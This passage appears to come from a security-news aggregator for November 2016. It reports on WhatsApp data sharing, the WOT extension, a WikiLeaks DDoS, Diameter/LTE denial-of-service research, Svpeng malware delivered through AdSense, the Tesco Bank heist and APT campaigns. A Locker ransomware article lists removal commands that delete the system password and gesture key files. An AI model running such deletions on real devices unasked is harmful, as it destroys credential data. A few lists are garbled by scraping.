„Důvodem tak vysokého počtu mohou být také značné investice do bezpečnostních řešení, která firmám umožňují co nejrychleji detekovat nové případy ransomwaru. Zločincům tak nezbývá než vytvářet stále nové modifikace svých malwarů,“ doplnil Sinitsyn.

Facebook agrees to Stop using UK Users' WhatsApp Data for Targeted Ads
8.11.2016 thehackernews Social
In August, Facebook introduced a hugely controversial data sharing plan to start harvesting data from its WhatsApp messaging app from September 25 for delivering more relevant ads on the social network.
Many users were not happy with the move, because there was no real way of opting out from the data sharing – WhatsApp users could only do so within a short period – and even if users did opt out then, some data would still be shared.
Eventually, some countries like Britain stood up and opposed the decision.
The Information Commissioner's Office (ICO) of the United Kingdom has asked Facebook and WhatsApp to better explain the changes to its customers in the U.K. And if they don't, the ICO could hand out a heavy fine.
What's the good news?
In response, the social media giant has agreed to "pause" sharing of data, including their phone numbers, between WhatsApp and Facebook in Britain to target advertisements on its core social network.
"We have now asked Facebook and WhatsApp to sign an undertaking committing to better explaining to customers how their data will be used, and to giving users ongoing control over that information," Elizabeth Denham, the Information Commissioner, wrote in a blog post.
"I don't think users have been given enough information about what Facebook plans to do with their information, and I don't think WhatsApp has got valid consent from users to share the information."
When Facebook announced this deal late August, Denham said she would investigate the changes to the Britain's data protection laws, and has now issued an update revealing the social networking giant has agreed to hold off data sharing from UK users.
Denham said that its users right to have control over their data and she now wanted Facebook and WhatsApp to let users restrict access to their information beyond the existing 30-day period, and let them completely opt-out of the agreement at any time.
When Facebook acquired WhatsApp for $19 Billion in 2014, users were worried about the company's commitment to protecting its users' privacy. But, WhatsApp reassured them that their privacy would not be compromised in any way.
But after the deal, the WhatsApp users felt betrayed by the company.
After introducing end-to-end encryption, WhatsApp has become one of the most popular secure messaging apps, but this shift in its privacy policy may force some users to switch to other secure apps like Telegram and Signal.
Neither Facebook nor WhatsApp has yet responded to the Information Commissioner's announcement.

'Web Of Trust' Browser Add-On Caught Selling Users' Data — Uninstall It Now
8.11.2016 thehackernews Security
Browser extensions have become a standard part of the most popular browsers and essential part of our lives for surfing the Internet.
But not all extensions can be trusted.
One such innocent looking browser add-on has been caught collecting browsing history of millions of users and selling them to third-parties for making money.
An investigation by German television channel NDR (Norddeutscher Rundfunk) has discovered a series of privacy breaches by Web Of Trust (WOT) – one of the top privacy and security browser extensions used by more than 140 Million online users to help keep them safe online.
Web of Trust has been offering a "Safe Web Search & Browsing" service since 2007. The WOT browser extension, which is available for both Firefox and Chrome, uses crowdsourcing to rate websites based on trustworthiness and child safety.
However, it turns out that the Web of Trust service collects extensive data about netizens' web browsing habits via its browser add-on and then sells them off to various third party companies.
What's extremely worrying? Web of Trust did not properly anonymize the data it collects on its users, which means it is easy to expose your real identity and every detail about you.
The WOT Privacy Policy states that your IP address, geo-location, the type of device, operating system, and browser you use, the date and time, Web addresses, and browser usage are all collected, but they are in "non-identifiable" format.
However, NDR found that it was very easy to link the anonymized data to its individual users.
The reporters focused on just a small data sample of around 50 WOT users, and were able to retrieve a lot of data, which included:
Account name
Mailing address
Shopping habits
Travel plans
Possible illnesses
Sexual preferences
Drug consumption
Confidential company information
Ongoing police investigations
Browser surfing activity including all sites visited
This data belonged to just 50 users, and WOT has more than 140 Million users. From here, you can imagine why the whole matter is of huge concern.
Mozilla has already removed the WOT extension from Firefox Add-ons page, and WoT, in turn, removed the extension from the Chrome Web Store as well.
In a statement, WOT said "we take our obligations to you very seriously. While we deployed great effort to remove any data that could be used to identify individual users, it appears that in some cases such identification remained possible, albeit for what may be a very small number of WOT users," claiming that they are taking these steps:
Reviewing our privacy policy to determine which changes need to be made to enhance and ensure that our users' privacy rights are properly addressed.
For the user browsing data used to enable WOT website reputation service, we intend to provide users the ability to opt-out of having such data saved in our database or shared. This opt-out will be available from the settings menu, as we want to provide each user with a clear choice at all times.
For people who agree to let us use their browsing data to support WOT, we will implement a complete overhaul of our data 'cleaning' process, to optimize our data anonymization and aggregation objectives to minimize any risk of exposure for our users.
For now, anyone using the WOT extension is strongly recommended to immediately uninstall the extension right now. WOT also has a mobile app that will not be immune to this data collection.

WikiLeaks published DNCLeak2, but someone DDoSed it
8.11.2016 securityaffairs Attack

WikiLeaks confirmed that the email publication server suffered a massive DDoS attack since it published a new set of DNC hacked emails dubbed as DNCLeak2.
A couple of days before the 2016 Presidential election, WikiLeaks has published a new set of emails hacked from the Democratic National Committee (DNC). The new set, dubbed DNCLeak2, includes 8,200 emails, the messages are added to the already leaked over 50,000 emails stolen from the DNC.

Visualizza l'immagine su Twitter
Visualizza l'immagine su Twitter
WikiLeaks ✔ @wikileaks
RELEASE: 8263 new emails from the DNC #DNCLeak2 #feelthebern #imwithher #demexit …
02:39 - 7 Nov 2016
20.758 20.758 Re 20.245 20.245 Mi piace
In one of the leaked emails, the former Clinton Foundation fundraiser Doug Band was slamming Chelsea Clinton for allegedly using the funds from the Clinton Foundation to pay for her wedding.

Early Monday morning WikiLeaks was targeted by a massive DDoS attack a few hours after the publishing of the DNCLeak2. The organization announced the attack via Twitter that shortly after it has released the DNC emails.

WikiLeaks ✔ @wikileaks
Our email publication servers are under a targeted DoS attack since releasing #DNCLeak2

You can increase capacity:
06:51 - 7 Nov 2016
12.391 12.391 Re 12.421 12.421 Mi piace
Evidently, someone disagreed the Wikileak’s decision of releasing this trove of email before the presidential election.

Below the message posted by WikiLeaks on its Facebook page:“Wikileaks Update: We are still under a DoS attack on our e-mail publication servers and it appears that Twitter is down as well, we are unable to confirm if this is an attack on twitter at this time.“
DNCLeak2 Assange US decision 2

Wikileaks was not the unique website that reported an outage, also Twitter went down for at least 30 minutes, but the two events appear to be uncorrelated.

Users on the Internet immediately linked the two incidents speculating a censorship activity operated by the US Government.
“Twitter went down because Wikileaks released #DNCleak2 It has begun! They are trying to suppress the truth from coming out!!!,” a Twitter user said.

“So Twitter was down due to the #DNCLeak2 released by @wikileaks – we should be worried, global censorship is heading our way,” another user said.

Technical analysis of the Locker virus on mobile phones
8.11.2016 securityaffairs Mobil

Security experts from Cheetah Mobile Security Research Lab published an interesting Technical analysis of the mobile variant of the Locker virus.
Blatant malicious behavior of the Locker virus

The Locker virus can easily be identified by its blatant malicious behavior. Here are the tell-tail signs:

Windows appear on the top of the home screen that prevents users from being able to use their phones.
The Activate device administrator page frequently displays in order to force users to grant the virus access to the system.
When the administrator is activated, the virus will change the lock screen password.
The virus will then keep the contact information of the users and use it to extort money.
locker virus 1
A screenshot of an infected phone.

Infections of the Locker virus

The worst-hit areas of the Locker virus in China are shown in Figure 1 below. There are about 3,000 users infected on daily basis.

locker virus 2-jpg
Figure 1. Locker virus infections in China

Figures 2 and 3 show the Locker virus infections worldwide in the last 15 days. The overall number of infections diversified, most of them in Russia.

locker virus 3
Figure 2. Locker virus infections worldwide in the last 15 days.

locker virus 4
Figure 3. Map view of the Locker virus infections worldwide in the last 15 days.

Don’t be tricked by the Locker virus

The Locker virus mainly disguises itself as system applications, like Android Update, Voice Assistant, and Adobe Flash Player. However, it can also appear as other applications, like adult video players, bank apps, and popular games, as shown in Figure 4.

locker virus 5
Figure 4. The many disguises of the Locker virus.

How does the Locker virus work?
Here are the various methods the Locker virus uses to lock a mobile screen:

Added in API level 1


Window type: An internal system error windows appear on the top of the screen. In multi-user systems, it only appears on the primary user’s window.

Constant Value: 2010 (0x000007da)

The internal system error window is displayed in front of all other windows (Figure 5).

locker virus 6
Figure 5. The internal system error window.


Added in API level 1


Window flag: All screen decorations (such as the status bar) are hidden when an app window with a flag set is on the top layer. This allows the window to use the entire display. A fullscreen window will ignore a value of SOFT_INPUT_ADJUST_RESIZE for the window’s softInputMode field; the window will stay fullscreen and will not resize.

Constant Value: 1024 (0x00000400)

It will hide all other content on the screen and only allow the current window to use the fullscreen.


Added in API level 1


Window flag: It will place the window within the entire screen, ignoring decorations around the border (such as the status bar). The window must correctly position its content to take the screen decoration into account. This flag is normally set (see Figure 6) by the WindowManager, as described in setFlags(int, int).

Constant Value: 256 (0x00000100)

It places the window on the whole screen.

locker virus 7
Figure 6. This flag is normally set by the WindowManager.

Added in API level 1


Window type: Non-application windows provide user interaction with the phone (such as incoming calls). These windows are normally placed above all applications but behind the status bar. In multi-user systems, it shows on all users’ windows.

Constant Value: 2002 (0x000007d2) – as shown in Figure 7

This window will be covered when there’s an incoming phone. Otherwise, the window is always in the top position, under the status bar.

locker virus 8
Figure 7. The window will be covered when there’s an incoming call.

Added in API level 1


Window type: These are transient notifications. In multi-user systems, it only shows on the primary user’s window.

Constant Value: 2005 (0x000007d5)

This window does not belong to the floating window, but it has the floating window’s function and can be displayed on the top layer (Figure 8).

locker virus 9
Figure 8. The window can be displayed on the top layer.

The virus keeps displaying the top layer activity. If the top layer is not activated, the virus will close and reopen it (Figure 9).

locker virus 10
Figure 9. Circular display of the top layer activity.

When the virus obtains administrator privileges, it changes the screen lock password (Figure 10).

locker virus -11
Figure 10. With administrator privileges, the virus can change the lock screen password.

Of all the methods mentioned above, the virus most frequently uses the flag TYPE_SYSTEM_ERROR to lock the screen. The second most common method is the circular display of the top layer activity. The proportion of these two methods are 16% and 84%, respectively, as shown in Figure 11.

Figure 11. The virus most frequently uses the flag TYPE_SYSTEM_ERROR to lock the screen.

Ways to protect your mobile phone

You can protect your mobile device from the Locked virus. Here’s how:

Do not install or open apps from unknown sources.
Do not grant administrator’s privilege to any unknown apps.
Open USB debugging to connect your mobile device to a computer – or delete it through other methods when necessary.
Another option is to flash to a third-party recovery service, such as TWRP.
Got Locked? We have solutions!

Here are some solutions to get rid of the Locked virus if your mobile device is infected:

If USB debugging has been opened on the phone, you can conduct the following orders on a computer to delete the Locked virus:
Conduct ‘pm list packages -3’ to find the package name of the virus.
Conduct ‘pm uninstall pkg’ to delete the virus.
Reboot the phone to enter recovery mode, and then make use of the file management function of a third-party recovery tool to delete the APK file in ‘/data/app/ pkg’.
If you have activated the administrator of the device and opened USB debugging, and the phone is rooted, you can forcefully delete the virus and the files where the screen unlock password is stored. This is how the virus can be cleared:
rm –r /data/app/’pkg’ directory
rm /data/system/password.key
rm /data/system/gesture.key

Abusing protocols in LTE networks to knock mobile devices off networks
8.11.2016 securityaffairs Mobil

A group of researchers from Nokia Bell Labs and Aalto University in Finland demonstrated how to hack protocols used in the LTE networks.
We discussed several times the rule of the SS7 signaling protocol in mobile communications and how to exploit its flaws to track users.

When mobile users travel between countries, their mobile devices connect to the infrastructure of a local operator that communicates with their operator back home. The SS7 protocol allows to implement roaming, but as explained it is also affected by many vulnerabilities that could be exploited for:

Location Tracking.
Denial of Service user & network.
Credential theft.
Data session hijackingUnblocking stolen phoneSMS interception.
SMS interception.
Unblocking stolen phoneSMS interception.
SMS interception.
One time password theft and account takeover for Telegram, Facebook, Whatsapp.
Diameter is considered the evolution of the SS7 protocol for modern Long-Term Evolution (LTE) networks, respect its predecessor it is more secure, isn’t it?

Anyway. experts discovered that Diameter is also affected by security issues, one if them, is the lack of mandatory implementation of the Internet Protocol Security (IPsec) protocol.

According to researchers from Nokia Bell Labs and Aalto University in Finland, this means that Diameter could be hacked with the same techniques that are effective against SS7.

The team of experts made several tests to evaluate attacks against users connected to the LTE network. They simulated the attacks on a test network set up by an unnamed global mobile operator. In the tests, they powered a cyber attack against UK subscribers from Finland and discovered several methods of disrupting service to users.

The researchers were able to temporarily and permanently shut down users connections, they were also able to target entire regions.

The team presented the results of tests at the Black Hat Europe security conference in London.

In order to launch the attack against another operator’s systems or subscribers, the researchers need to access to the private interconnection network (IPX).The experts demonstrated that there are several ways to access IPX, for example, a persistent attacker like a government could oblige a local operator to gain access through it.

Attackers could act as a virtual network operator and get access to the roaming network through an existing operator. They could also hack into one of the nodes run by an operator that is accessible from the internet. Let’s give a close look at LTE networks and their main components:

LTE Networks

LTE NetworksThe nodes of the LTE networks are called Mobility Management Entities (MMEs that provide session management, subscriber authentication, roaming and handovers to other networks. The signal is spread through cell towers meanwhile the home subscriber server (HSS) is the component that holds the master subscriber database.Other essential components of LTE networks are the Diameter Edge Agents (DEAs) that words as gateways to the interconnection network via IPX providers.In the attack scenario, the hacker needs the victim’s international mobile subscriber identity (IMSI), an information that is quite easy to obtain targeting the IPX network by masquerading as a Short Message service center (SMSC) that’s trying to deliver a text message to the victim phone number.This means that the knowledge of the victim’s phone number, aka Mobile Station International Subscriber Directory Number (MSISDN), and the DEA of the victim’s operator, are all you need to carry on the attack against a specific user.
The attacker sends a routing information request through the DEA to the operator’s HSS, which will respond with the subscriber’s IMSI as well as the identity of the MME the subscriber is connected to.

Great now the attacker has the info to start the attack!

At this point, the attacker masquerading as a partner’s HSS sends a Cancel Location Request (CLR) message to the victim’s MME causing the disconnection of the specific subscriber.

The CLR messages are normally used inside the LTE network when subscribers switch from one MME to another because of a change in location.

The researchers also highlighted another possible to exploit this mechanism to obtain a sort of amplification factor of the request. The researchers noticed that when the subscriber re-attaches, their device will send 20 different messages to the MME.


Imagine the case the attackers force the detachment of hundreds of subscribers at the same time, the MME will be flooded by ‘re-attach’ messages causing a DoS in large areas covered by Mobility Management Entities.

There is also a second DoS attack scenario in which the attackers can impersonate an HSS and send an Insert Subscriber Data Request (IDR) to the victim’s MME with a special value that means no service. This will permanently detach the mobile user from the network because their subscription will be changed in the MME’s records.

In this case, the only way to attach the network again is contacting the mobile operator.

As you can see also LTE networks and Diameter are vulnerable to hacking attack, for this reason, the researchers highlighted the need for further security measures.

For further information give a look at the slides (“Detach me not DoS attacks against 4G cellular users worldwide from your desk“) presented at the BlackHatEurope 2016.

Cisco vylepší zabezpečení koncových bodů pomocí nové cloudové služby

8.11.2016 SecurityWorld Zabezpečení
AMP for Endpoints, cloudové řešení, které podle výrobce spojuje prevenci, detekci a reakci na hrozby, představilo Cisco. Chce pomocí něj zjednodušit zabezpečení koncových bodů bez důrazu na neefektivní preventivní strategii.

Spojením prevence, detekce a reakce na hrozby do jednoho cloudového řešení poskytovaného na bázi modelu software jako služba (SaaS) prý novinka zastaví více hrozeb.

Díky cloudovému modelu navíc podle výrobc dokáže reagovat na hrozby rychleji a lépe je připraví na triky dnešních útočníků.

Vlastnosti AMP for Endpoints podle dodavatele:

Prevence nové generace kombinující osvědčené a pokročilé typy bezpečnostních funkcí, která zastaví známé i nově vzniklé hrozby. Páteř systému tvoří globální informace o hrozbách od týmu Cisco Talos. Díky tomu může novinka nabídnout zabudovanou technologii integrovaného izolovaného prostředí (tzv. sandboxu) pro oddělení a analýzu neznámých souborů.
Lepší viditelnost a rychlejší detekci díky průběžnému monitoringu a sdílení analytik pro odhalení skrytých útoků. AMP for Endpoints zaznamenává veškerou aktivitu na úrovni souborů a dokáže proto rychle detekovat škodlivé aktivity a upozornit bezpečnostní tým. Produkt disponuje největším množstvím dat o hrozbách, neboť analyzuje všechny škodlivé soubory, které se objevily u zákazníků firmy Cisco.
Účinnější odezvu postavenou na viditelnosti sítě a detailním záznamům o minulém chování různých typů malwaru – odkud se do sítě dostaly, kde byly a jak se chovaly. Produkt zrychluje proces odhalování škodlivého softwaru a cloudové rozhraní umožňuje vyhledávat napříč všemi podnikovými koncovými body a snadno zjistit indikátory, podle kterých škodlivý software lze odhalit.

Kromě toho Cisco zavádí nový způsob nákupu a nasazení svého bezpečnostního softwaru, a to přes program softwarových licencí Cisco ONE Software.

China Passes Cybersecurity Law to Tighten its Control over the Internet
7.11.2016 thehackernews Cyber
China has long been known for its strict censorship policies, which has already made it difficult for foreign companies to do business in the world's most populous country of more than 1.35 Billion people.
Now, the Chinese government has approved a broad new controversial cybersecurity regulations that would further strengthen the country's censorship regime, making it more difficult for technology companies to operate in the country.
Made public on Monday, the legislation, passed by China's rubber-stamp parliament and set to go into effect in June 2017, aims at combating growing threats like hacking and terrorism, but actually comes with data localization, real-name requirements, and surveillance.
The Cybersecurity Law requires instant messaging services and other internet operators to force users to register with their real names and personal information, which restricts anonymity of a user online.
The proposed law also includes requirements for 'Data Localization' that would force "critical information infrastructure operators" to store its users' data within the country's borders – the same law Russian government imposed on foreign tech companies.
Chinese Human Rights Watch (HRW) is opposing the legislation, saying that the new law doesn't include any precise definition of infrastructure operators, and will further extend government control over an already heavily monitored and censored media.
"The law will effectively put China's Internet companies, and hundreds of millions of Internet users, under greater state control," HRW's China director Sophie Richardson said in a statement over the weekend.
"Despite widespread international concern from corporations and rights advocates for more than a year, Chinese authorities pressed ahead with this restrictive law without making meaningful changes."
Moreover, the new legislation also covers some new requirements for cyber security, forcing companies to provide "technical support" to government agencies for investigations involving national security and crime and to censor contents that are "prohibited."
Although this technical support is not clearly defined in the law, experts believe that authorities could ask companies for encryption backdoors or other surveillance assistance in the name of tech support.
Under this law, companies and network operators should report "security incidents" to the government and inform consumers of data breaches.
Acts that encourages "overthrowing the socialist system," "fabricating or spreading false information to disturb economic order," and inciting "separatism or damage national unity" are categorized as criminal acts under the new law.
Such requirements have raised serious concerns for the users and companies operating in China, where the Internet and online freedom have already heavily censored by the government.

Disassembling a Mobile Trojan Attack
7.11.2016 Kaspersky Mobil
In early August we detected several cases of a banking Trojan being downloaded automatically when users viewed certain news sites on their Android devices. Later it became apparent that this was being caused by advertising messages from the Google AdSense network, and was not restricted to news sites. In fact, any site using AdSense to display adverts could potentially have displayed messages that downloaded the dangerous Trojan-Banker.AndroidOS.Svpeng and automatically saved it to the device’s SD card. This behavior surprised us: typically, the browser warns users about downloading a potentially dangerous file, and offers them a choice of whether or not to save the file. We intercepted traffic coming from the attacked device when this sort of “advert” was displayed, and figured out how the malicious program was downloaded and automatically saved.

Some statistics

First of all, let’s provide some information about the latest versions of Trojan-Banker.AndroidOS.Svpeng. It is limited to Russia and the CIS (more about this later). Below is a graph showing detections of the Trojan’s latest version – Svpeng.q.


And here is the graph for the previous version that was distributed in July 2016, also via AdSense:


As you can see from the graphs, within a two-month period Svpeng was detected on the computers of approximately 318,000 users, with the detection rate peaking at around 37,000 attacked users in one day. The high rates and abrupt changes in the number of detections are easy to explain: Google has been quick to block the ads that the Trojan uses for propagation. However, this is a reactive rather than a proactive approach – the malicious ads were blocked after the Trojan was already on thousands of Android devices. It is also worth noting that there were multiple occasions in the past two months when these ads found their way on to AdSense; similar attacks have been occurring up to the present time, with the most recent attack registered on 12 September 2016.

Now for the juicy part


Let’s look at how the displaying of an ad is related to the automatic download of the APK file containing the Trojan and it being saved to the SD card. Below is the HTTP request that leads to the cybercriminals’ advert being displayed:


In response to this request, the server sends a Javascript script that displays the ad message. However, this script contains a hidden surprise: at the beginning there is some heavily obfuscated code. Let’s look, step by step, at what this code actually does:

Declares the variables necessary for operation and deciphers the payload:

We can see that the APK file was downloaded in the form of an encrypted array of bytes in the script. Now it just needs to be saved to the SD card.

Defines the function that will save the file.

The code checks the availability of functions from various browser engines, and if they are unavailable, defines its own function. The object URL and the element <a> (the latter being an HTML notation for a link) are created in this function. The resulting link is assigned the attribute ‘href’ (where the link leads to), and the malicious program emulates a click on this link. This method is not new; quite possibly the Trojan’s creators borrowed it from here, and only added obfuscation and a restriction: the click simulation is only done on touchscreen devices, which for the most part are smartphones.

Breaks the decrypted APK file into blocks of 1024 bytes.

Sets the handler for a page load event. Handler activation initiates the automatic saving of the APK file to the SD card.

Apart from the extra checks to see if the script runs on the smartphone or not, there is an important check in the code to identify the language used on the device. The attackers only target smartphones with a Russian-language interface – these are typically devices belonging to users in Russia and, to a lesser degree, CIS states.

Where’s the catch?

The method described above only works in Google Chrome for Android. When an APK file is downloaded via a link leading to an external web resource, the browser displays a warning that a potentially dangerous object is being downloaded, and prompts the user to choose whether or not to save the file.


When an APK file is broken down into pieces and handed over to the save function via Blob() class, there is no check for the type of the content being saved, so the browser saves the APK file without notifying the user.

We notified Google about this browser behavior and that it was being exploited to distribute malicious content. At the time of publishing a patch had been released that fixed this problem in Google Chrome and will become available to users the next time the browser is updated.

In all other browsers, this method either does not work, or the user is asked if they want to save the file or not. Kaspersky Lab recommends updating Google Chrome to prevent infection by the malware when viewing sites that use AdSense.


Of course, just downloading the Trojan is not enough for it to work; the user also has to install it. To ensure this, the attackers resort to social engineering. The Trojan may be downloaded with any of the following names:

These names imitate the names of popular legitimate apps or try to convince users that the downloaded app is important and has to be installed. In the latest versions of Android, installation of apps downloaded from unknown sources is blocked by default, but the cybercriminals are obviously counting on users disabling this setting to install an “important browser update” or a newer version of a popular app that is already on their phone.

So far, those behind Svpeng have limited their attacks to smartphone users in Russia. However, next time they push their “adverts” on AdSense they may well choose to attack users in other countries; we have seen similar cases in the past. After all, what could be more convenient than exploiting the most popular advertising platform to download their malicious creations to hundreds of thousands of mobile devices?

Tesco Bank suspended all online transactions due to a cyber heist

7.11.2016 securityaffairs Crime

Tesco Bank halted all online transactions after a cyber heist affected thousands of its customers. An investigation is ongoing.
Tesco Bank is going to adopt a strong measure in response to a cyber attack, the financial institution will freeze customers’ online transactions. The measure was announced by the chief executive Benny Higgins, the bank has admitted that 40,000 of 136,000 current banking customers had their accounts hacked over the weekend, and unfortunately 50 percent of them have lost money.

Tesco Bank is owned by Tesco PLC since 2008 and has currently 7.8 million customer accounts. Tesco confirmed to have detected suspicious activity within accounts “late on Saturday night and in the early hours of Sunday morning.”

Higgins explained that the bank has adopted the emergency security measure of the cyber heist.
“We apologise for the worry and inconvenience that this has caused for customers, and can only stress that we are taking every step to protect our customers’ accounts,” said Mr Higgins.

“That is why, as a precautionary measure, we have taken the decision today to temporarily stop online transactions from current accounts.”

The bank reported the incident to the authorities and is currently supporting an ongoing investigation. The Online banking service will resume “when we are on top of the issue”, Mr Higgins told BBC Radio 4’s Today programme.programme.
This attack will remain in history due to the number of customers affected and the emergency measure adopted by the financial institution.

Tesco has downplayed the amount of money that was stolen from the customers’ accounts, anyway the bank will refund all losses and has apologized for poor customer service that supported the users that tried to receive information by calling the bank over the weekend.

Tesco bank -cyber-heist

According to the Telegraph, one man ed his available balance had dropped by £700 without and he never made a transaction.

“We have been hacked, all money gone, no email or text! Appalling response from Tesco so far nobody answering,” one ed.
While security experts are trying to identify the threat actor behind the attack, Mr Higgins refused to speculate on the possible culprit.

“In the modern world it is impossible to be totally impregnable. We are in dialogue with the national crime agencies and with the financial conduct authority.” he said.

Kybernetičtí podvodníci připravili 20 000 klientů Tesco Bank o peníze

7.11.2016 Novinky/Bezpečnost Kriminalita
Terčem kybernetického útoku se tentokrát stali zákazníci britské finanční společnosti Tesco Bank. Kybernetickým podvodníkům se podařilo přesunout peníze ze zhruba 20 000 účtů bankovní divize největšího britského maloobchodního řetězce Tesco. Firma slíbila, že vzniklé finanční ztráty zákazníkům nahradí.
Tesco Bank spravuje zhruba 136 000 běžných účtů. Firma v reakci na útok zastavila veškeré internetové transakce, zákazníci nicméně mohou dál používat platební karty k nákupům i k výběru hotovosti.

Veškeré finanční ztráty plynoucí z těchto podvodných aktivit převezme banka," uvedl generální ředitel společnosti Benny Higgins. „Zákazníkům nehrozí žádné finanční riziko," dodal.

Podle Higginse firma během víkendu zaznamenala podezřelé aktivity u zhruba 40 000 účtů, peníze se útočníkům podařilo převést ze zhruba poloviny z nich. „Domníváme se, že částky, které zmizely, jsou relativně nízké, stále na tom ale pracujeme," uvedl Higgins.

Celkové náklady na odškodnění zákazníků budou podle Higginse představovat částku "velkou", ale ne "obrovskou". Agentura Reuters nicméně upozorňuje, že i v případě omezených finanční dopadů hrozí společnosti Tesco Bank výrazné poškození pověsti.

IT threat evolution Q3 2016

7.11.2016 Kaspersky Analysis

Targeted attack campaigns don’t need to be technically advanced in order to be successful. In July 2016 we reported on a group called Dropping Elephant (also known as ‘Chinastrats’ and ‘Patchwork’). Using a combination of social engineering, old exploit code and some PowerShell-based malware this group was able to steal sensitive data from its victims.

This group, which has been active since November 2015, targets high profile diplomatic and economic organizations linked to China’s foreign relations – an interest that is evident from the themes the attackers use to trap their victims.

The attackers use a combination of spear-phishing e-mails and watering-hole attacks. The first involves sending a document with remote content. When the victim opens the document, a ping request is sent to the attackers’ Command-and-Control (C2) server. The victim then receives a second spear-phishing e-mail, containing either a Word document or a PowerPoint file (these exploit old vulnerabilities – CVE-2012-0158 and CVE-2014-6352 respectively). Once the payload has been executed, a UPX-packed AutoIT executable is dropped on to the system: once executed, this downloads further components from the C2 server and the theft of data from the victim’s computer begins.

In Q3 2016, @kaspersky repelled 172m malicious attacks via online resources located in 191 countries #KLreport #Infosec

The attackers also created a watering-hole website that downloads genuine news articles from legitimate websites. If a visitor wants to view the whole article, they are prompted to download a PowerPoint file: this reveals the rest of the document, but also asks the victim to download a malicious object. The attackers sometimes e-mail links to their watering-hole website. In addition, they maintain Google+, Facebook and Twitter accounts, to develop relevant search engine optimization (SEO) and to reach out to wider targets.

The success of the Dropping Elephant group is striking given that no zero-day exploits or advanced techniques were used to target high-profile victims – it’s clear that by applying security updates and improving the security awareness of staff, the success of attacks like this can be prevented. At the start of the year we predicted that APT groups would invest less effort in developing sophisticated tools and make greater use of off-the-shelf malware. Dropping Elephant provides a further example of how low investment and use of ready-made toolsets can be very effective when combined with high quality social engineering.


In September, our Anti-Targeted Attack Platform flagged an anomaly in the network of a customer’s organization. Further investigation led us to uncover ProjectSauron, a group that has been stealing confidential data from organizations in Russia, Iran and Rwanda – and probably other countries – since June 2011. We have identified more than 30 victims: the target organizations all play a key role in providing state services and come from government, military, scientific research, telecommunications and financial sectors.


ProjectSauron is particularly focused on obtaining access to encrypted communications, hunting for them using an advanced, modular cyber-espionage platform that incorporates a set of unique tools and techniques. The cost, complexity, persistence and the ultimate goal of the operation (i.e. stealing secret data from state-related organizations) suggest that ProjectSauron is a state-sponsored campaign. ProjectSauron gives the impression of an experienced threat group that has made a considerable effort to learn from other highly advanced attacks, including Duqu, Flame, Equation and Regin – adopting some of their most innovative techniques and improving on their tactics in order to remain undiscovered.


One of the most noteworthy features of ProjectSauron is the deliberate avoidance of patterns: the implants used by the group are customized for each victim and are never re-used. This makes the use of traditional Indicators of Compromise (IoC) almost useless. This approach, along with the use of multiple routes for the exfiltration of stolen data (such as legitimate e-mail channels and DNS) enables ProjectSauron to conduct well-hidden, long-term spying campaigns in targeted networks.

Key features of ProjectSauron:

core implants that are unique for each victim;
use of legitimate software update scripts;
use of backdoors that download new modules or run commands in memory only;
focus on information relating to custom network encryption software;
use of low-level tools orchestrated by high-level LUA scripts (the use of LUA is very rare – previously seen only in Flame and Animal Farm attacks;
use of specially prepared USB drives to jump across air-gapped networks, with hidden compartments for storing stolen data;
use of multiple exfiltration mechanisms to conceal transfer of data in day-to-day traffic.
The method used to initially infect victims remains unknown.

The single use of unique methods, such as control server, encryption keys and more, in addition to the adoption of cutting-edge techniques from other major threats groups, is new. The only effective way to withstand such threats is to deploy multiple layers of security, with sensors to monitor for even the slightest anomaly in organizational workflow, combined with threat intelligence and forensic analysis. You can find further discussion of the methods available to deal with such threats here.


In August, a person or group going under the name ‘ShadowBrokers’ claimed to possess files belonging to the Equation group. They provided links to two PGP encrypted archives. They provided the password to the first for free, but ‘auctioned’ the second, setting the price at 1 million BTC (1/15th of the bitcoins in circulation).

Having uncovered the Equation group in February 2015, we were interested in examining the first archive. It contains almost 300MB of firewall exploits, tools and scripts, under cryptonyms such as BANANAUSURPER, BLATSTING and BUZZDIRECTION. Most of the files are at least three years old, with change entries pointing to August 2013 and the newest time-stamp dating to October 2013.


The Equation group makes extensive use of RC5 and RC6 encryption algorithms (these algorithms were designed by Ronald Rivest in 1994 and 1998 respectively). The free trove provided by ShadowBrokers includes 347 different instances of RC5 and RC6 implementations. The implementation is functionally identical with that found in the Equation malware – and has not been seen elsewhere.


The code similarity makes us believe with a high degree of confidence that the tools from the ShadowBrokers leak are related to the malware from the Equation group.

Operation Ghoul

In June, we noticed a wave of spear-phishing e-mails with malicious attachments. The messages, sent mainly to top and middle level managers of numerous companies, appeared to be coming from a bank in the UAE. The messages claimed to offer payment advice from the bank and included an attached SWIFT document. But the archive really contained malware. Further investigation revealed that the June attacks were the most recent operation of a group that researchers had been tracking for more than a year, named Operation Ghoul by Kaspersky Lab.

The group successfully attacked more than 130 organizations from 30 countries, including Spain, Pakistan, UAE, India, Egypt, the United Kingdom, Germany and Saudi Arabia. Based on information obtained from the sink-hole of some C2 servers, the majority of the target organizations work in the industrial and engineering sectors. Others include shipping, pharmaceutical, manufacturing, trading and educational organizations.


The malware used by the Operation Ghoul group is based on the commercial spyware kit Hawkeye, sold openly on the Dark Web. Once installed, the malware collects interesting data from the victim’s computer, including keystrokes, clipboard data, FTP server credentials, account data from browsers, messaging clients, e-mail clients and information about installed applications. This data is sent to the group’s C2 servers.

The aim of the campaign seems to be financial profit – all the targeted organizations hold valuable data that can be sold on the black market.

The continued success of social engineering as a way of gaining a foothold in target organizations highlights the need for businesses to make staff awareness and education a central component of their security strategy.

Malware stories


In June 2016 we reported on the Lurk banking Trojan, used to systematically siphon money from the accounts of commercial organizations in Russia – among them, a number of banks. The police estimate the losses caused by this Trojan at around $45 million.

During our research into this Trojan, it became apparent that victims of Lurk had also installed the remote administration software, Ammyy Admin. While we didn’t give it much thought at first, it became apparent that the official Ammyy Admin website had been compromised and was being used by the Lurk gang as part of a watering-hole attack: the Trojan was downloaded to victim’s computers along with the legitimate software.


The dropper on the Ammyy Admin site started distributing a different Trojan on 1 June 2016, ‘Trojan-PSW.Win32.Fareit’: this was the day that the alleged creators of the Lurk Trojan were arrested. It seems that those responsible for the Ammyy Admin website breach were happy to sell their Trojan dropper to anyone who wanted to distribute malware from the compromised site.

